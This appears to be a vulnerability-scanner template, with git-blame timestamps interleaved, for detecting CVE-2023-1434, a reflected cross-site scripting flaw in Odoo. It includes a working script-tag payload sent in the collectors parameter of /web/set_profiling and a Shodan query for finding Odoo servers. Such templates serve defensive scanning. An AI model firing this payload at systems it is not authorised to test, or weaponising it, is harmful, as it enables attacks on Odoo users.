2023-05-17 05:25:25 +00:00
id : CVE-2023-1434
info :
name : Odoo - Cross-Site Scripting
author : DhiyaneshDK
severity : medium
2023-06-12 10:31:17 +00:00
description : |
Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.
2023-05-17 05:25:25 +00:00
reference :
- https://www.sonarsource.com/blog/odoo-get-your-content-type-right-or-else
2023-05-30 12:41:56 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1434
classification :
cve-id : CVE-2023-1434
cwe-id : CWE-79
2023-05-17 05:25:25 +00:00
metadata :
max-request : 1
2023-06-04 08:13:42 +00:00
verified : true
2023-05-17 05:25:25 +00:00
shodan-query : title:"Odoo"
tags : cve,cve2023,odoo,xss
http :
- method : GET
path :
2023-05-30 12:41:56 +00:00
- "{{BaseURL}}/web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script>"
2023-05-17 05:25:25 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- '<script>alert(document.domain)</script>'
2023-05-18 13:52:06 +00:00
- '"params":'
- 'session'
2023-05-17 05:25:25 +00:00
condition : and
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200